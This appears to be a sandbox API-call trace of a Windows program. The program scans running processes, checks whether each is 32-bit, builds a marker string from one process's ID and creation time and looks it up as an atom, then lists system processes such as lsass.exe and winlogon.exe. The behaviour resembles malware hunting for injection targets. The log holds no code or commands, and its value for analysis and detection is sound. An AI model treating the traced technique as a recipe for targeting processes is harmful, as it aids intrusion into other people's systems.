	[0083.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x460
	[0083.561] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.561] CloseHandle (hObject=0x460) returned 1
	[0083.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0083.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0083.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x460
	[0083.562] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.562] CloseHandle (hObject=0x460) returned 1
	[0083.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0083.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x460
	[0083.562] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.562] CloseHandle (hObject=0x460) returned 1
	[0083.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x460
	[0083.562] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.562] CloseHandle (hObject=0x460) returned 1
	[0083.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x460
	[0083.562] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.563] CloseHandle (hObject=0x460) returned 1
	[0083.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x460
	[0083.563] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.563] CloseHandle (hObject=0x460) returned 1
	[0083.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x460
	[0083.563] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.563] CloseHandle (hObject=0x460) returned 1
	[0083.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x460
	[0083.563] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.563] CloseHandle (hObject=0x460) returned 1
	[0083.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0083.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x460
	[0083.563] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.563] CloseHandle (hObject=0x460) returned 1
	[0083.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x460
	[0083.563] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.564] CloseHandle (hObject=0x460) returned 1
	[0083.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x460
	[0083.564] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.564] CloseHandle (hObject=0x460) returned 1
	[0083.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0083.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x460
	[0083.564] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.564] CloseHandle (hObject=0x460) returned 1
	[0083.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x460
	[0083.564] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.564] CloseHandle (hObject=0x460) returned 1
	[0083.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x460
	[0083.564] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.564] CloseHandle (hObject=0x460) returned 1
	[0083.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x460
	[0083.564] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.564] CloseHandle (hObject=0x460) returned 1
	[0083.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x460
	[0083.565] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.565] CloseHandle (hObject=0x460) returned 1
	[0083.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x460
	[0083.565] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.568] CloseHandle (hObject=0x460) returned 1
	[0083.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x460
	[0083.568] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.568] CloseHandle (hObject=0x460) returned 1
	[0083.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x460
	[0083.568] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.568] CloseHandle (hObject=0x460) returned 1
	[0083.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x460
	[0083.568] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.569] CloseHandle (hObject=0x460) returned 1
	[0083.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x460
	[0083.569] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.569] CloseHandle (hObject=0x460) returned 1
	[0083.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x460
	[0083.569] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.569] CloseHandle (hObject=0x460) returned 1
	[0083.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x460
	[0083.569] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.569] CloseHandle (hObject=0x460) returned 1
	[0083.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x460
	[0083.569] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.569] CloseHandle (hObject=0x460) returned 1
	[0083.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x460
	[0083.569] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.569] CloseHandle (hObject=0x460) returned 1
	[0083.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x460
	[0083.570] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.570] CloseHandle (hObject=0x460) returned 1
	[0083.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x460
	[0083.570] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.570] CloseHandle (hObject=0x460) returned 1
	[0083.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x460
	[0083.570] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.570] CloseHandle (hObject=0x460) returned 1
	[0083.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x460
	[0083.570] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.570] CloseHandle (hObject=0x460) returned 1
	[0083.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x460
	[0083.570] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.570] CloseHandle (hObject=0x460) returned 1
	[0083.570] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x460
	[0083.571] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.571] CloseHandle (hObject=0x460) returned 1
	[0083.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x460
	[0083.571] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.571] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0083.571] GetProcessTimes (in: hProcess=0x460, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0083.571] wsprintfA (in: param_1=0x759ba0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0083.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.572] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0083.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.572] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0083.572] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0083.572] CloseHandle (hObject=0x460) returned 1
	[0083.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0083.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0083.572] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x460
	[0083.572] IsWow64Process (in: hProcess=0x460, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.573] CloseHandle (hObject=0x460) returned 1
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0083.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0083.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x484
	[0083.631] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.631] CloseHandle (hObject=0x484) returned 1
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x484
	[0083.631] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.631] CloseHandle (hObject=0x484) returned 1
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x484
	[0083.631] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.631] CloseHandle (hObject=0x484) returned 1
	[0083.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x484
	[0083.632] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.632] CloseHandle (hObject=0x484) returned 1
	[0083.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x484
	[0083.632] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.632] CloseHandle (hObject=0x484) returned 1
	[0083.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x484
	[0083.632] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.632] CloseHandle (hObject=0x484) returned 1
	[0083.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x484
	[0083.632] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.632] CloseHandle (hObject=0x484) returned 1
	[0083.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x484
	[0083.632] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.632] CloseHandle (hObject=0x484) returned 1
	[0083.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0083.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x484
	[0083.633] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.633] CloseHandle (hObject=0x484) returned 1
	[0083.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x484
	[0083.633] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.633] CloseHandle (hObject=0x484) returned 1
	[0083.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x484
	[0083.633] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.633] CloseHandle (hObject=0x484) returned 1
	[0083.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0083.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x484
	[0083.633] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.633] CloseHandle (hObject=0x484) returned 1
	[0083.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x484
	[0083.633] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.633] CloseHandle (hObject=0x484) returned 1
	[0083.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x484
	[0083.634] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.634] CloseHandle (hObject=0x484) returned 1
	[0083.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x484
	[0083.634] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.634] CloseHandle (hObject=0x484) returned 1
	[0083.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x484
	[0083.634] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.634] CloseHandle (hObject=0x484) returned 1
	[0083.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x484
	[0083.634] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.634] CloseHandle (hObject=0x484) returned 1
	[0083.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x484
	[0083.634] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.634] CloseHandle (hObject=0x484) returned 1
	[0083.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x484
	[0083.634] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.634] CloseHandle (hObject=0x484) returned 1
	[0083.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x484
	[0083.635] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.635] CloseHandle (hObject=0x484) returned 1
	[0083.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x484
	[0083.635] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.635] CloseHandle (hObject=0x484) returned 1
	[0083.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x484
	[0083.635] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.635] CloseHandle (hObject=0x484) returned 1
	[0083.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x484
	[0083.635] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.635] CloseHandle (hObject=0x484) returned 1
	[0083.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x484
	[0083.635] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.635] CloseHandle (hObject=0x484) returned 1
	[0083.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x484
	[0083.635] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.635] CloseHandle (hObject=0x484) returned 1
	[0083.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x484
	[0083.636] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.636] CloseHandle (hObject=0x484) returned 1
	[0083.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x484
	[0083.636] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.636] CloseHandle (hObject=0x484) returned 1
	[0083.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x484
	[0083.636] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.636] CloseHandle (hObject=0x484) returned 1
	[0083.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x484
	[0083.636] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.636] CloseHandle (hObject=0x484) returned 1
	[0083.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x484
	[0083.636] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.636] CloseHandle (hObject=0x484) returned 1
	[0083.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x484
	[0083.636] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.637] CloseHandle (hObject=0x484) returned 1
	[0083.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x484
	[0083.637] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.637] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0083.637] GetProcessTimes (in: hProcess=0x484, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0083.637] wsprintfA (in: param_1=0x759df0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0083.638] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.638] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0083.638] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.638] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0083.638] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0083.638] CloseHandle (hObject=0x484) returned 1
	[0083.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0083.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0083.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x484
	[0083.639] IsWow64Process (in: hProcess=0x484, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.639] CloseHandle (hObject=0x484) returned 1
	[0083.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d40) returned 0xc0000004
	[0083.793] VirtualAlloc (lpAddress=0x0, dwSize=0x16e40, flAllocationType=0x3000, flProtect=0x4) returned 0x38f0000
	[0083.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38f0000, Length=0x16e40, ResultLength=0x0 | out: SystemInformation=0x38f0000, ResultLength=0x0) returned 0x0
	[0083.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0083.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7d99d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0083.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0083.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7d99d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0083.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0083.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7d99d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0083.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7d99d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0083.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7d99d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0083.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7d99d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0083.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0083.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0083.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76ca50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0083.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
